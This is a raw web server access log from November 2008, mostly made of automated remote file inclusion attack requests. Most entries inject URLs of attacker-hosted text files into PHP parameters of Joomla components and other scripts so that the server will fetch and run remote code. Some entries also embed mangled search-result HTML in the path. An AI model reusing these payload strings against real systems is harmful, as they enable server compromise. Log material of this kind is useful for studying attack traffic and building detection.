206.225.91.21 - - [03/Nov/2008:07:59:28 -0600] "GET /logs//?pm_path=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 200 105506 "-""libwww-perl/5.79"
190.5.195.145 - - [03/Nov/2008:07:59:34 -0600] "GET /logs/access_log.1214179200%22%20%20lang=%22en%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214179200&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3EHTTP/1.1%22%20404%20297%20%22-%22%22libwww-perl/5.65%22%2061.142.80.108%20-%20-%20[22/Jun/2008:19:04:09%20...%20search?hl=pt-BR&safe=off&client=firefox-a&rls=org.mozilla%3Apt-BR%3Aofficial&hs%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214179200%3C/span%3E%20-%20%3Cem%3E450k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0geumbE9Q5JhngBGrFzKAx.;_ylu=X3oDMTB0NjNnOHM2BHNlYwNzcgRwb3MDNzkzBGNvbG8DYWMyBHZ0aWQD/SIG=12ap0716i/EXP=1225803588/**http%3a/forum.pipni.cz/read.php%3ff=2%26i=4477%26t=4477//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 425 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:07:59:34 -0600] "GET /logs/access_log.1214179200%22%20%20lang=%22en%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214179200&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3EHTTP/1.1%22%20404%20297%20%22-%22%22libwww-perl/5.65%22%2061.142.80.108%20-%20-%20[22/Jun/2008:19:04:09%20...%20search?hl=pt-BR&safe=off&client=firefox-a&rls=org.mozilla%3Apt-BR%3Aofficial&hs%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214179200%3C/span%3E%20-%20%3Cem%3E450k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0geumbE9Q5JhngBGrFzKAx.;_ylu=X3oDMTB0NjNnOHM2BHNlYwNzcgRwb3MDNzkzBGNvbG8DYWMyBHZ0aWQD/SIG=12ap0716i/EXP=1225803588/**http%3a/forum.pipni.cz//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 425 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:07:59:35 -0600] "GET /logs/access_log.1216425600%22%20%20lang=%22en%22%3Etomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1216425600&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3E89.188.110.128%20-%20-%20[18/Jul/2008:19:00:38%20-0500]%20%22GET%20/include/write.php?dir%20...%20HTTP/1.1%22%20404%20302%20%22-%22%22libwww-perl/5.805%22%2058.69.172.67%20-%20-%20[18/Jul/2008:19:01:43%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1216425600%3C/span%3E%20-%20%3Cem%3E528k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0geumbE9Q5JhngBHrFzKAx.;_ylu=X3oDMTB0NmZtZmN1BHNlYwNzcgRwb3MDNzk3BGNvbG8DYWMyBHZ0aWQD/SIG=120mmlnm1/EXP=1225803588/**http%3a/stowmaszrol.com.pl/papierowa-rocznica//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 425 "-""libwww-perl/5.76"
190.5.195.145 - - [03/Nov/2008:07:59:35 -0600] "GET /logs/access_log.1216425600%22%20%20lang=%22en%22%3Etomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1216425600&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3E89.188.110.128%20-%20-%20[18/Jul/2008:19:00:38%20-0500]%20%22GET%20/include/write.php?dir%20...%20HTTP/1.1%22%20404%20302%20%22-%22%22libwww-perl/5.805%22%2058.69.172.67%20-%20-%20[18/Jul/2008:19:01:43%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1216425600%3C/span%3E%20-%20%3Cem%3E528k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0geumbE9Q5JhngBHrFzKAx.;_ylu=X3oDMTB0NmZtZmN1BHNlYwNzcgRwb3MDNzk3BGNvbG8DYWMyBHZ0aWQD/SIG=120mmlnm1/EXP=1225803588/**http%3a/stowmaszrol.com.pl//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 425 "-""libwww-perl/5.76"
78.129.231.189 - - [03/Nov/2008:08:02:20 -0600] "GET /logs/access_log.1218672000//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
78.129.231.189 - - [03/Nov/2008:08:02:20 -0600] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
78.129.231.189 - - [03/Nov/2008:08:02:20 -0600] "GET /logs/access_log.1216684800//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
210.213.5.1 - - [03/Nov/2008:08:02:24 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:02:25 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:02:53 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:02:54 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.86.233.109 - - [03/Nov/2008:08:03:44 -0600] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
203.86.233.109 - - [03/Nov/2008:08:03:44 -0600] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
65.55.208.122 - - [03/Nov/2008:08:04:14 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [03/Nov/2008:08:04:14 -0600] "GET /?S=A HTTP/1.1" 200 1243 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.190.202.150 - - [03/Nov/2008:08:04:26 -0600] "GET /logs/index.php?openfile=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.190.202.150 - - [03/Nov/2008:08:04:27 -0600] "GET /index.php?openfile=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.190.202.150 - - [03/Nov/2008:08:04:27 -0600] "GET /logs/index.php?openfile=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.190.202.150 - - [03/Nov/2008:08:04:27 -0600] "GET /index.php?openfile=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.153.37.130 - - [03/Nov/2008:08:04:40 -0600] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
217.153.37.130 - - [03/Nov/2008:08:04:40 -0600] "GET //ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
217.153.37.130 - - [03/Nov/2008:08:04:40 -0600] "GET /logs/access_log.1214179200//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
208.83.106.201 - - [03/Nov/2008:08:08:08 -0600] "GET /logs/access_log.1208304000//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:08:08:08 -0600] "GET //?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:08:08:08 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 105506 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:08:08:25 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:08:08:25 -0600] "GET /logs/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:08:08:25 -0600] "GET /index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:08:08:31 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:08:10:00 -0600] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.198.59.139 - - [03/Nov/2008:08:10:13 -0600] "GET /logs/?sourcedir=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 200 105501 "-""libwww-perl/5.805"
213.198.59.139 - - [03/Nov/2008:08:10:13 -0600] "GET /?sourcedir=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
140.130.101.5 - - [03/Nov/2008:08:10:19 -0600] "GET /logs/access_log.1216252800/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:08:10:19 -0600] "GET /index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:08:10:19 -0600] "GET /logs/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
74.6.18.228 - - [03/Nov/2008:08:10:38 -0600] "GET /tattoo/ HTTP/1.0" 200 466 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
140.130.101.5 - - [03/Nov/2008:08:10:52 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:08:10:52 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
207.150.183.60 - - [03/Nov/2008:08:10:56 -0600] "GET /logs//modules/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:08:10:57 -0600] "GET //modules/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
213.198.59.139 - - [03/Nov/2008:08:11:24 -0600] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
213.198.59.139 - - [03/Nov/2008:08:11:24 -0600] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
77.104.245.71 - - [03/Nov/2008:08:11:34 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
210.213.5.1 - - [03/Nov/2008:08:12:47 -0600] "GET /logs/access_log.1206144000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:12:48 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:12:49 -0600] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:13:01 -0600] "GET /logs/access_log.1206144000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:13:02 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:13:05 -0600] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
216.65.1.253 - - [03/Nov/2008:08:13:10 -0600] "GET /logs//components/com_rwcards/captcha/captcha_image.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
216.65.1.253 - - [03/Nov/2008:08:13:10 -0600] "GET //components/com_rwcards/captcha/captcha_image.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
216.65.1.253 - - [03/Nov/2008:08:13:13 -0600] "GET /logs//components/com_rwcards/captcha/captcha_image.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
216.65.1.253 - - [03/Nov/2008:08:13:16 -0600] "GET //components/com_rwcards/captcha/captcha_image.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
77.104.245.71 - - [03/Nov/2008:08:13:27 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.104.245.71 - - [03/Nov/2008:08:13:27 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.104.245.71 - - [03/Nov/2008:08:13:27 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.104.245.71 - - [03/Nov/2008:08:13:27 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
83.2.108.2 - - [03/Nov/2008:08:14:15 -0600] "GET /canal.php?meio=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
83.2.108.2 - - [03/Nov/2008:08:14:15 -0600] "GET /logs/canal.php?meio=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
210.213.5.1 - - [03/Nov/2008:08:15:17 -0600] "GET /logs/access_log.1206144000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:15:18 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:15:19 -0600] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
208.83.106.201 - - [03/Nov/2008:08:15:33 -0600] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
140.130.101.5 - - [03/Nov/2008:08:16:28 -0600] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:08:16:28 -0600] "GET //?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:08:16:31 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 105506 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
66.40.52.30 - - [03/Nov/2008:08:17:04 -0600] "GET /logs//modules/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:08:17:04 -0600] "GET //modules/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.800"
208.83.106.201 - - [03/Nov/2008:08:17:27 -0600] "GET /logs/access_log.1219017600//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
140.130.101.5 - - [03/Nov/2008:08:17:32 -0600] "GET /logs/access_log.1208304000//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
211.223.228.3 - - [03/Nov/2008:08:17:41 -0600] "GET //tags.php?BBCodeFile=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
211.223.228.3 - - [03/Nov/2008:08:17:41 -0600] "GET /logs//tags.php?BBCodeFile=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
129.241.50.187 - - [03/Nov/2008:08:18:26 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""boitho.com-dc/0.82 ( http://www.boitho.com/dcbot.html )"
66.197.201.69 - - [03/Nov/2008:08:18:50 -0600] "GET /logs///addpost_newpoll.php?addpoll=preview&thispath=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:08:18:51 -0600] "GET ///addpost_newpoll.php?addpoll=preview&thispath=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
203.86.233.109 - - [03/Nov/2008:08:19:07 -0600] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
61.50.221.108 - - [03/Nov/2008:08:20:14 -0600] "GET /logs//classified_right.php?language_dir=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 310 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
61.50.221.108 - - [03/Nov/2008:08:20:18 -0600] "GET //classified_right.php?language_dir=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 305 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
210.213.5.1 - - [03/Nov/2008:08:22:05 -0600] "GET /logs/index.php?link=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:22:07 -0600] "GET /logs/index.php?link=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:22:08 -0600] "GET /index.php?link=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:22:09 -0600] "GET /index.php?link=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:08:22:46 -0600] "GET /logs/index.php?link=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:08:22:46 -0600] "GET /index.php?link=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
213.198.59.139 - - [03/Nov/2008:08:23:52 -0600] "GET /logs/index.php?link=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.198.59.139 - - [03/Nov/2008:08:23:52 -0600] "GET /index.php?link=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.86.233.109 - - [03/Nov/2008:08:23:59 -0600] "GET /logs/access_log.1206144000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 377 "-""libwww-perl/5.803"
203.86.233.109 - - [03/Nov/2008:08:23:59 -0600] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
203.86.233.109 - - [03/Nov/2008:08:24:00 -0600] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
210.213.5.1 - - [03/Nov/2008:08:24:04 -0600] "GET /logs/index.php?link=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.213.5.1 - - [03/Nov/2008:08:24:05 -0600] "GET /index.php?link=http://kukesii.t35.com/ids.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
195.3.194.35 - - [03/Nov/2008:08:25:50 -0600] "GET /logs/index.php?link=http://bugisku.com/chid.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.3.194.35 - - [03/Nov/2008:08:25:50 -0600] "GET /index.php?link=http://bugisku.com/chid.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.198.59.139 - - [03/Nov/2008:08:27:10 -0600] "GET /logs/index.php?link=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.198.59.139 - - [03/Nov/2008:08:27:10 -0600] "GET /index.php?link=http://iau.jjes.tyc.edu.tw/ann/inc/sql/id3.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
208.83.106.201 - - [03/Nov/2008:08:28:18 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:08:28:18 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:08:28:18 -0600] "GET /logs/access_log.1217116800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.149.69.97 - - [03/Nov/2008:08:29:00 -0600] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:08:29:00 -0600] "GET /logs/access_log.1206144000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:08:29:00 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
